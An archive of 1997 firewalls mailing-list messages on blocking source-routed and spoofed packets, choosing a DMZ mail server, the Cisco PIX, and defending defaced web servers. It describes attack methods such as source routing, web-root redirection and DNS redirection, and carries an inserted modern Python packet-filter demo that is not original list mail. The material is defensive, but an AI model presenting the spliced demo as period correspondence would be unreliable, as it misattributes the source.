Received: from wintermute.marievik.findata.se by mail.swip.net (8.6.8/3.01) id BAA07400; Sun, 5 Jan 1997 01:16:36 +0100
Received: from wintermute.marievik.findata.se (ckn@wintermute.marievik.findata.se [192.71.39.5]) by wintermute.marievik.findata.se (8.6.4/8.6.4) with SMTP id BAA22991 for ; Sun, 5 Jan 1997 01:16:34 +0100
Date: Sun, 5 Jan 1997 01:16:33 +0100 (MET)
From: Carl Karlsson
X-Sender: ckn@wintermute.marievik.findata.se
Reply-To: Carl Karlsson
To: firewalls@GreatCircle.COM
Subject: Re: Re[2]: NT NAT
In-Reply-To: <3.0.32.19970104111733.006caf34@lint.cisco.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sat, 4 Jan 1997, Paul Ferguson wrote:

> At 09:43 AM 1/4/97 -0600, Peter da Silva wrote:
>
> >> Please correct me if I'm wrong here but I was under the impression that
> >> the 192.168.x.x-addresses were 'non-routable' or whatever the term is.
> >> Under what circumstances can an external intruder gain access to my
> >> internal 192.168.x.x-machines?
> >
> >Source routed packets.
>
> Which are easily stopped.

You guys have a cool terse way of discussing interesting things.
:) I was thinking that source routed packets were the answer to my question, and I was also believing that they could be stopped. Do I need to care about source routed packets if my upstream provider has everything configured as they should? If I am using, for example, Linux, would it be enough to configure the Linux kernel to drop source routed packets? To configure the Linux firewall to ignore localnet packets from the external link?

Many questions.. I'll accept an RTFM answer if someone also tells me WTFM is. :)

Calle

From firewalls-owner Sat Jan 4 17:23:36 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA10353 for firewalls-outgoing; Sat, 4 Jan 1997 17:02:02 -0800 (PST)
Received: from mail.u-net.net (mail.u-net.net [194.119.128.80]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA10346 for ; Sat, 4 Jan 1997 17:01:50 -0800 (PST)
Received: from mint.u-net.com ([193.119.188.245]) by mail.u-net.net with ESMTP id <40977-7806>; Sun, 5 Jan 1997 00:57:34 +0000
From: "Mr. S Armitage"
To:
Subject: Slow down
Date: Wed, 1 Jan 1997 14:09:59 -0000
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Message-Id: <97Jan5.005734+0000_gmt.40977-7806+30@mail.u-net.net>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi, your service is great but I'm getting that much mail I don't have time to read it. I already have at least fifty unread firewalls digests. So would it be possible to remove my name from the mailing list and give me time to catch up.
Thanks
armo@mint.u-net.com

----------

From firewalls-owner Sat Jan 4 17:29:00 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA10273 for firewalls-outgoing; Sat, 4 Jan 1997 17:00:50 -0800 (PST)
Received: from mail.baileynm.com (fw.baileynm.com [206.109.159.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA10264 for ; Sat, 4 Jan 1997 17:00:41 -0800 (PST)
Received: (qmail 13766 invoked from smtpd); 5 Jan 1997 01:00:16 -0000
Received: from web.nmti.com (root@198.178.0.201) by fw.nmti.com with SMTP; 5 Jan 1997 01:00:16 -0000
Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id TAA21833; Sat, 4 Jan 1997 19:00:16 -0600
Received: by sonic.nmti.com; id AA02172; Sat, 4 Jan 1997 19:00:10 -0600
From: peter@baileynm.com (Peter da Silva)
Message-Id: <9701050100.AA02172@sonic.nmti.com.nmti.com>
Subject: Re: Re[2]: NT NAT
To: ckn@findata.se
Date: Sat, 4 Jan 1997 19:00:09 -0600 (CST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: from "Carl Karlsson" at Jan 5, 97 01:16:33 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Do I need to care about
> source routed packets if my upstream provider has everything configured
> as they should?

Yes. Don't depend on a third party maintaining a configuration correctly
for the proper operation of your firewall.

> If I am using for example Linux, would it be enough to
> configure the linux kernel to drop source routed packets?

I don't know. It's a sysctl option in FreeBSD.
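The two measures Carl asks about above (have the kernel drop source-routed packets, and have the firewall ignore packets that claim a localnet source on the external link) can be shown as filter logic. What follows is an added example, not code from anyone on the list or from any firewall product: a small Python packet-filter simulation run over constructed IPv4 headers. It assumes a constructed topology (192.168.0.0/16 as the site's internal range, interfaces named "ext" and "int") and goes one step beyond the thread by also rejecting a non-internal source address seen on the internal interface, the mirror image of the ingress check.

```python
"""Constructed packet-filter demo: drop source-routed IPv4 packets and
reject spoofed source addresses per interface (assumed topology)."""
import ipaddress
import struct

# Assumed topology for the demo: 192.168.0.0/16 is the site's internal
# range; the link to the provider is "ext", the LAN side is "int".
INTERNAL_NETS = [ipaddress.ip_network("192.168.0.0/16")]
EXTERNAL_IFACE, INTERNAL_IFACE = "ext", "int"

# IPv4 option types for loose and strict source routing (RFC 791).
LSRR, SSRR = 131, 137


def build_ipv4(src, dst, options=b""):
    """Build a minimal IPv4 header (no payload, zero checksum) for the demo."""
    options += b"\x00" * (-len(options) % 4)      # pad options to 32-bit words
    ihl = 5 + len(options) // 4
    fixed = struct.pack("!BBHHHBBH4s4s",
                        (4 << 4) | ihl, 0, 20 + len(options), 0x1234, 0, 64, 6, 0,
                        ipaddress.IPv4Address(src).packed,
                        ipaddress.IPv4Address(dst).packed)
    return fixed + options


def lsrr_option(*hops):
    """Encode a loose source route option (constructed test input only)."""
    body = b"".join(ipaddress.IPv4Address(h).packed for h in hops)
    return bytes([LSRR, 3 + len(body), 4]) + body


def option_status(packet):
    """Walk the option list; return 'source-routed', 'malformed' or 'clean'."""
    ihl = (packet[0] & 0x0F) * 4
    if ihl < 20 or len(packet) < ihl:
        return "malformed"
    opts = packet[20:ihl]
    i = 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                              # end of option list
            break
        if kind == 1:                              # NOP: single-byte padding
            i += 1
            continue
        if i + 1 >= len(opts) or opts[i + 1] < 2:  # length byte missing/absurd
            return "malformed"
        if kind in (LSRR, SSRR):
            return "source-routed"
        i += opts[i + 1]                           # skip any other option
    return "clean"


def filter_packet(iface, packet):
    """Return ('ACCEPT', '') or ('DROP', reason) for a packet seen on iface."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return "DROP", "not a well-formed IPv4 header"
    status = option_status(packet)
    if status != "clean":
        return "DROP", status
    src = ipaddress.IPv4Address(packet[12:16])
    src_is_internal = any(src in net for net in INTERNAL_NETS)
    if iface == EXTERNAL_IFACE and src_is_internal:
        return "DROP", "internal source address arriving on external interface"
    if iface == INTERNAL_IFACE and not src_is_internal:
        return "DROP", "foreign source address arriving on internal interface"
    return "ACCEPT", ""


def demo():
    """Run the filter over constructed packets; return the verdicts in order."""
    cases = [
        (EXTERNAL_IFACE, build_ipv4("203.0.113.9", "198.51.100.1")),
        (EXTERNAL_IFACE, build_ipv4("192.168.1.5", "198.51.100.1")),
        (EXTERNAL_IFACE, build_ipv4("203.0.113.9", "198.51.100.1",
                                    lsrr_option("198.51.100.1", "192.168.1.5"))),
        (INTERNAL_IFACE, build_ipv4("192.168.1.5", "203.0.113.9")),
        (INTERNAL_IFACE, build_ipv4("10.0.0.1", "203.0.113.9")),
    ]
    return [filter_packet(iface, pkt) for iface, pkt in cases]


if __name__ == "__main__":
    for verdict, reason in demo():
        print(verdict, reason)
```

The option walk is the part worth copying: a source-route option can sit behind NOP padding, so the filter parses the option list instead of peeking at a fixed offset, and an option list it cannot parse is dropped as malformed rather than waved through as clean.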
From firewalls-owner Sat Jan 4 17:36:19 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA09845 for firewalls-outgoing; Sat, 4 Jan 1997 16:55:21 -0800 (PST)
Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA09815 for ; Sat, 4 Jan 1997 16:55:10 -0800 (PST)
Received: from big-dogs.cisco.com ([171.68.53.75]) by lint.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id QAA25824; Sat, 4 Jan 1997 16:54:10 -0800 (PST)
Message-Id: <3.0.32.19970104195407.006c3e84@lint.cisco.com>
X-Sender: pferguso@lint.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Sat, 04 Jan 1997 19:54:09 -0500
To: Carl Karlsson
From: Paul Ferguson
Subject: Re: Re[2]: NT NAT
Cc: firewalls@GreatCircle.COM
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Apologies for the terseness. :-)

I certainly wouldn't rely on my upstream service provider to block source-routed traffic; normally, they don't care. In fact, they generally support it to troubleshoot routing problems [ie. traceroute -g option].

I can't speak to kernel or OS modifications (since I'm an old router jockey anyway), but source-routed IP packets can be easily dropped on a cisco router by adding the global parameter:

    no ip source-route

to the router configuration.

- paul

At 01:16 AM 1/5/97 +0100, Carl Karlsson wrote:
>> >Source routed packets.
>>
>> Which are easily stopped.
>
>You guys have a cool terse way of discussing interesting things. :) I was
>thinking that source routed packets were the answer to my question, and I
>was also believing that they could be stopped. Do I need to care about
>source routed packets if my upstream provider has everything configured
>as they should? If I am using for example Linux, would it be enough to
>configure the linux kernel to drop source routed packets?
>To configure the
>linux firewall to ignore localnet packets from the external link?
>Many questions.. I'll accept an RTFM answer if someone also tells me WTFM
>is. :)
>

--
Paul Ferguson                        ||        ||
Consulting Engineering               ||        ||
Herndon, Virginia USA               ||||      ||||
tel: +1.703.397.5938            ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com          c i s c o  S y s t e m s

From firewalls-owner Sat Jan 4 17:44:00 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA10785 for firewalls-outgoing; Sat, 4 Jan 1997 17:09:42 -0800 (PST)
Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA10778 for ; Sat, 4 Jan 1997 17:09:30 -0800 (PST)
Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vgh4Y-0004FgC (Debian Smail-3.2 1996-Jul-4 #2); Sun, 5 Jan 1997 02:08:22 +0100 (MET)
Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Sun, 5 Jan 97 02:08 MET
Received: by lina id m0vggy9-0004ixC (Debian Smail-3.2 1996-Jul-4 #2); Sun, 5 Jan 1997 02:01:45 +0100 (MET)
Message-Id:
From: lists@lina.inka.de (Bernd Eckenfels)
Subject: Re: Re[2]: NT NAT
To: ckn@findata.se
Date: Sun, 5 Jan 1997 02:01:44 +0100 (MET)
Cc: firewalls@GreatCircle.COM
In-Reply-To: from "Carl Karlsson" at Jan 5, 97 01:16:33 am
X-Mailer: ELM [version 2.4 PL25 PGP2]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

> Do I need to care about
> source routed packets if my upstream provider has everything configured
> as they should?

Ask your upstream provider; how should we know if he is filtering source routed packets? You can drop them at your router which links you to the outside world. Use firewall rules or settings like "drop source routed frames" with Linux.
> If I am using for example Linux, would it be enough to
> configure the linux kernel to drop source routed packets? To configure the
> linux firewall to ignore localnet packets from the external link?

Both. And to ignore packets from your internal net as the source on external interfaces. And ignore packets with internal address as source on external interface and so on. This will prevent IP spoofing and will block most simple attacks.

Greetings
Bernd
y

From firewalls-owner Sat Jan 4 19:34:22 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA18678 for firewalls-outgoing; Sat, 4 Jan 1997 19:13:04 -0800 (PST)
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [204.246.65.62]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA18671 for ; Sat, 4 Jan 1997 19:12:57 -0800 (PST)
Received: from parka.winternet.com (dufresne@parka.winternet.com [198.174.169.9]) by darkstar.sysinfo.com (8.8.2/8.8.2) with SMTP id VAA00477; Sat, 4 Jan 1997 21:14:21 -0600
Date: Sat, 4 Jan 1997 21:06:27 -0600 (CST)
From: Ron DuFresne
To: Peter da Silva
cc: ckn@findata.se, firewalls@GreatCircle.COM
Subject: Re: Re[2]: NT NAT
In-Reply-To: <9701050100.AA02172@sonic.nmti.com.nmti.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At least the 2.0.x kernels and newer have this as a config option when you rebuild the kernel...

Later,

Ron DuFresne

On Sat, 4 Jan 1997, Peter da Silva wrote:

> > Do I need to care about
> > source routed packets if my upstream provider has everything configured
> > as they should?
>
> Yes. Don't depend on a third party maintaining a configuration correctly
> for the proper operation of your firewall.
>
> > If I am using for example Linux, would it be enough to
> > configure the linux kernel to drop source routed packets?
>
> I don't know. It's a sysctl option in FreeBSD.
>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

From firewalls-owner Sat Jan 4 19:47:32 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA18798 for firewalls-outgoing; Sat, 4 Jan 1997 19:14:32 -0800 (PST)
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [204.246.65.62]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA18791 for ; Sat, 4 Jan 1997 19:14:19 -0800 (PST)
Received: from parka.winternet.com (dufresne@parka.winternet.com [198.174.169.9]) by darkstar.sysinfo.com (8.8.2/8.8.2) with SMTP id VAA00489; Sat, 4 Jan 1997 21:15:49 -0600
Date: Sat, 4 Jan 1997 21:07:59 -0600 (CST)
From: Ron DuFresne
To: Bernd Eckenfels
cc: ckn@findata.se, firewalls@GreatCircle.COM
Subject: Re: Re[2]: NT NAT
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

And for the 2.0.x kernels there is a patch to help control syn floods...

Later,

Ron DuFresne

On Sun, 5 Jan 1997, Bernd Eckenfels wrote:

> Hello,
>
> > Do I need to care about
> > source routed packets if my upstream provider has everything configured
> > as they should?
>
> Ask your upstream provider; how should we know if he is filtering source
> routed packets? You can drop them at your router which links you to the
> outside world. Use firewall rules or settings like "drop source routed
> frames" with Linux.
>
> > If I am using for example Linux, would it be enough to
> > configure the linux kernel to drop source routed packets? To configure the
> > linux firewall to ignore localnet packets from the external link?
>
> Both.
> And to ignore packets from your internal net as the source on
> external interfaces. And ignore packets with internal address as source on
> external interface and so on. This will prevent IP spoofing and
> will block most simple attacks.
>
> Greetings
> Bernd
> y
>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

From firewalls-owner Sat Jan 4 21:29:19 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA24739 for firewalls-outgoing; Sat, 4 Jan 1997 21:20:29 -0800 (PST)
Received: from exon.massart.mass.edu ([134.241.139.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id VAA24725 for ; Sat, 4 Jan 1997 21:20:21 -0800 (PST)
Received: (from paonia@localhost) by exon.massart.mass.edu (8.7.5/8.7.3) id AAA15351; Sun, 5 Jan 1997 00:19:56 -0500
From: Paonia Ezrine
Message-Id: <199701050519.AAA15351@exon.massart.mass.edu>
Subject: which mta 4 dmz
To: firewalls@greatcircle.com
Date: Sun, 5 Jan 1997 00:19:56 -0500 (EST)
Cc: mick@janis.massart.edu, mbrodsky@phx.com (Michael Brodsky)
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am trying to decide which MTA to use on the external mail machine. I am thinking about these:

1. sendmail 8.8.4
2. zmailer 2.9.44.1
3. qmail 0.95
4. exim

What are people using? What would you suggest, pros/cons?
thanks
paonia

From firewalls-owner Sun Jan 5 16:44:13 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA24259 for firewalls-outgoing; Sun, 5 Jan 1997 16:26:12 -0800 (PST)
Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA24219 for ; Sun, 5 Jan 1997 16:25:49 -0800 (PST)
Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vh2sS-0004IVC (Debian Smail-3.2 1996-Jul-4 #2); Mon, 6 Jan 1997 01:25:20 +0100 (MET)
Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Mon, 6 Jan 97 01:25 MET
Received: by lina id m0vgvHH-0004ixC (Debian Smail-3.2 1996-Jul-4 #2); Sun, 5 Jan 1997 17:18:27 +0100 (MET)
Message-Id:
From: lists@lina.inka.de (Bernd Eckenfels)
Subject: Re: which mta 4 dmz
To: paonia@exon.massart.mass.edu (Paonia Ezrine)
Date: Sun, 5 Jan 1997 17:18:27 +0100 (MET)
Cc: firewalls@greatcircle.com, mick@janis.massart.edu, mbrodsky@phx.com
In-Reply-To: <199701050519.AAA15351@exon.massart.mass.edu> from "Paonia Ezrine" at Jan 5, 97 00:19:56 am
X-Mailer: ELM [version 2.4 PL25 PGP2]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

> I am tring to deside which mta do use on the external mail machine. I am
> thinking about these
> 1. sendmail 8.8.4

Medium Performance
-Full of bugs, complicated sendmail.cf.
+Good for rewriting headers, well known. Could be run as non-privileged user.

> 2. zmailer 2.9.44.1

Memory consuming
-Complicated to configure
+Lots of features. IMHO unstable. Not sure about security.

> 3. qmail 0.95

Network consuming
-no bang path support, uncommon
+fast, secure, easy to set up, useful features

> 4. exim

Hmm.. don't have much info about that
-no bang path support
+fast and useful features

5.
smail

Medium Performance
-complicated in high traffic situations
+easy to set up. Not many bugs are known. Can run as unprivileged relay.

6. smap/smapd

Mail Proxy only.
-Needs another MTA behind itself. Does not do much header sanity checking.
+small program (which doesn't do much :)

7. smtpd/forwd

Mail Proxy only
-Needs another MTA.
+small program which does fairly good header data checks.

Personally I would either use smail or qmail, depending on the tasks which need to be carried out.

Greetings
Bernd

PS: for smap smtpd see http://www.inka.de/sites/lina/freefire-l/

--
  (OO)   -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de --
 ( .. )  ecki@{inka.de,linux.de,debian.org}  http://home.pages.de/~eckes/
  o--o   *plush*  2048/93600EFD  eckes@irc  +4972573817  BE5-RIPE
(O____O) If privacy is outlawed only Outlaws have privacy

From firewalls-owner Sun Jan 5 20:29:02 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA04687 for firewalls-outgoing; Sun, 5 Jan 1997 20:16:53 -0800 (PST)
Received: from email.acsinc.net ([206.156.73.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id UAA04677 for ; Sun, 5 Jan 1997 20:16:42 -0800 (PST)
Received: from keith.acsinc.net (arisiasoft.acsinc.net [206.156.73.34]) by email.acsinc.net (Netscape Mail Server v1.1) with ESMTP id AAA63 for ; Sun, 5 Jan 1997 23:16:41 -0500
From: keithstevens@acsinc.net (Keith Stevens)
To:
Subject: Cisco PIX
Date: Sun, 5 Jan 1997 23:13:35 -0500
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Message-ID: <19970106041640725.AAA63@keith.acsinc.net>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Is there a bastion host / proxy server that out-performs Cisco's PIX in throughput? Security? Ease of implementation?

From my limited perspective as a newbie, the Cisco PIX in combination with a good screening router is a very good firewall.
Not to be a wise guy, I'm seriously asking: with this technology available, is there ever a reason to build one from scratch? I might be able to do it cheaper - but if it takes a couple weeks or a month to do, it might cost more.

I'm not in any way affiliated with Cisco.

Keith Stevens
keith@acsinc.net

From firewalls-owner Sun Jan 5 23:06:49 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA09504 for firewalls-outgoing; Sun, 5 Jan 1997 21:52:20 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id VAA09470 for firewalls@greatcircle.com; Sun, 5 Jan 1997 21:51:49 -0800 (PST)
Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA17474 for ; Tue, 31 Dec 1996 13:01:58 -0800 (PST)
From: uskanbye@ibmmail.com
Message-Id: <199612312101.NAA17474@miles.greatcircle.com>
Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 3767; Tue, 31 Dec 96 16:01:20 EST
Date: Tue, 31 Dec 1996 16:00:41 EST
To: firewalls@greatcircle.com
X-Sender-Info: Mitchell Ummel CSP CCP, KDHE Network Manager Office of Information Systems, Tech Services Section
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Subject: Re: Air Force Web Site Hacked
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I don't agree with the premise that a CD-ROM based WWW server is a viable option. Unless your web site is very static (no databases, no HTML generation, no frequent updates?), this would be cumbersome indeed, and still NO guarantee against hacking.

Case in point... unless your DNS server is also "CD-ROM based" as well (a silly proposition), a hacker can always point your WWW server domain name to another "hacked" IP address. Physical read-only storage may offer SOME protection, but still not hackproof (not to mention the probable performance penalty you'd pay for optical).
----------------WWW.INK.ORG\PUBLIC\KDHE-------------------
--------KANSAS DEPARTMENT OF HEALTH & ENVIRONMENT---------
----------Mills Bldg Suite 501 Topeka, KS 66612-----------
---------Phone (913) 296-5643 FAX (913) 296-8943----------

*** Forwarding note from I5004693--IBMMAIL 12/31/96 15:42 ***

Date: Tue, 31 Dec 1996 11:41:27 -0800
From: Mark Johnson
To: Dale Drew
CC: Michael Idengren , Christopher Klaus , firewalls@GreatCircle.COM
Subject: Re: Air Force Web Site Hacked

Dale Drew wrote:
>
> I don't see how CDROM provides significant advantages on a WEB server
> "graffiti" attack.
>
> Using a CDROM web-server doesn't provide resistance to an
> attacker who gains access to the system as ROOT (or the user that owns
> the http process), and the system has some form of (or access to)
> writable media available.
>
> The attacker just repoints the httpd root tree to the writable media (eg;
> "/tmp") and away from the CDROM.
>
> http://www.security.mci.net
> ===============================================================
> Dale Drew                        MCI Telecommunications
> Sr. Manager                      internetMCI Security
>                                  Engineering
> Voice: 703/715-7058              Internet: ddrew@mci.net
> Fax:   703/715-7066              MCIMAIL:  Dale_Drew/644-3335
>
> At 11:57 PM 12/30/96 -0500, Michael Idengren wrote:
> >I don't know about the rest of you but I agree with the idea of putting a
> >webserver on a CD-ROM. I think the government can afford to write a new
> >CD every time they need to update someone's email address anyways :)
> >
> >Mike Idengren                    | MEISTER
> >---------------------------------+----------------------------------
> >Center for Information Technology| Alachua Free-Net IRC Administrator
> >Stetson University               | WorldWide Free-Net IRC Network Coordinator
> >
> >

I have not set one up yet (Planned for July), but I believe you can have a totally CDROM machine, at least using Novell or NT. Bootable CDROMs and all data on CDROM so you would not have any writable media. Can anyone confirm or deny my thoughts?
Mark

--
Mark Johnson
Network Project Manager
St. Mary's Regional Med Ctr
mark@hercules.reno.nv.us

---- End of mail text

Additional SMTP headers from original mail item follow:

Received: from relay1.UU.NET by ibmmail.COM (IBM VM SMTP V2R3) with TCP; Tue, 31 Dec 96 15:43:03 EST
Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQbwna15264; Tue, 31 Dec 1996 15:42:24 -0500 (EST)
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA12757 for firewalls-outgoing; Tue, 31 Dec 1996 11:35:24 -0800 (PST)
Received: from heather.greatbasin.com (heather.greatbasin.com [140.174.194.41]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA12750 for ; Tue, 31 Dec 1996 11:35:17 -0800 (PST)
Received: from marks (hercules.reno.nv.us [204.94.161.224]) by heather.greatbasin.com (8.8.4/8.7.3) with SMTP id LAA14508; Tue, 31 Dec 1996 11:34:30 -0800 (PST)
Message-ID: <32C96C67.7D78@hercules.reno.nv.us>
X-Mailer: Mozilla 3.0 (WinNT; I)
MIME-Version: 1.0
References: <3.0.32.19961231124626.007717e4@166.45.1.38>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

From firewalls-owner Sun Jan 5 23:18:34 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA11469 for firewalls-outgoing; Sun, 5 Jan 1997 22:16:45 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id VAA09528 for firewalls@greatcircle.com; Sun, 5 Jan 1997 21:52:32 -0800 (PST)
Received: from odin.cmp.ilstu.edu (odin.cmp.ilstu.edu [138.87.1.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA17297 for ; Wed, 1 Jan 1997 14:43:08 -0800 (PST)
From: mrwilhe@odin.cmp.ilstu.edu
Received: from hawkins-13.isbe.state.il.us by odin.cmp.ilstu.edu (AIX 4.1/UCB 5.64/4.03) id AA15722; Wed, 1 Jan 1997 16:42:12 -0600
Message-Id:
<1.5.4.32.19970101224653.008ff9d0@odin.cmp.ilstu.edu>
X-Sender: mrwilhe@odin.cmp.ilstu.edu
X-Mailer: Windows Eudora Light Version 1.5.4 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Wed, 01 Jan 1997 16:46:53 -0600
To: firewalls@GreatCircle.COM
Subject: airfhack--secure/hacked web server
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On the idea of the RAM mem--it would have to be something special--only changed by physical means (rebooting?)--one could not inflict something of non-physical forces to change the RAM. (Sorta like the BIOS holding a passwd--you can clear the password by taking the chip out -- yes, I know there are ways around this, but something similar for the RAM mem/disk would suffice to keep it from being hacked.)

Another statement that was brought up was that CD-ROM or other write-once media, or a physical write lock on the hard drive (HD prob more practical), would keep one from being able to change the page often -- the statement I made at first was meant for only sites that don't change their pages often -- not pages such as www.news.com. I don't believe that the main pages of the CIA/DIA/FBI/NSA/NI and other sites that hold stats..... change their pages that often.

fsh <<>>

The following are some of the major points made on this subject (sorry if I left out some).

"Seriously: why not just put it on a separate disk which is mounted
> read-only? If you want to go further, you could buy a suitable harddisk
> which can be write-locked by hardware. regards:jamie"

" The Web server would have to be based on all write once media -- from the
> Operating systems and all other aspects, otherwise the attacker would just
> redirect the homepage contents to a hard drive.

Doesn't matter, I could just launch a server that redirected you to a site with the content mirrored and altered, or serve the pages out of memory, or off of RAM disk." From: "Paul D.
Robertson"

"A CD-ROM -based web server would be fine if you created web pages, pressed a CD, and then never again expected to add/delete/modify the content. But this is The Real World (tm)." Mark Johnson

"Not to disagree with anything Paul has said, because I don't, but the original premise was government web sites not high volume web sites. How often do the Air Force's web pages need to change? Not too often I would wager, they don't *need* re-visits, they don't have advertising (at least I would expect they don't, I haven't checked actually), they are there just to provide some mostly static information. Given that, I think there is merit to a write-once media approach. But not, as Paul and others point out, as a general solution." Dave Kinchlea

[from Michael Idengren:]
> I don't know about the rest of you but I agree with the idea of putting a
> webserver on a CD-ROM.

[from Thomas Leitner:]
> why not just put it on a separate disk which is mounted
> read-only?

[from Dale Drew:]
> Using a CDROM web-server doesn't provide resistance to an
> attacker who gains access to the system as ROOT...

Keep in mind that this entire thread assumes that the attacker will *not* take an easier approach, such as compromising the DNS records that point to the server. In this case, the attacker can create any web content they like, spend all the time in the world creating it, and then quickly convince the DNS servers that www.foo.com now resolves to the new (fake) address. Securing your www server is just a first (although important) step.

I do think read-only media is an interesting idea, by the way :) Dale is right though, there are still vulnerabilities. Personally, I like the idea of marking the files immutable myself. This way, even root can't change the content unless the machine is brought down into single-user mode. Not sure how many other operating systems support this other than (the great) BSDI though.

Happy new year (2 minutes to go...),
Norm

1.
My comment was partially meant as a joke; it's horribly impractical for ISPs and Universities and such to require operator intervention every time a webpage needs to be updated. Such a level of paranoia *might* only be appropriate for government agencies and authoritative advanced research sites.

From: Michael Idengren

From firewalls-owner Mon Jan 6 00:14:13 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA17243 for firewalls-outgoing; Sun, 5 Jan 1997 23:56:58 -0800 (PST)
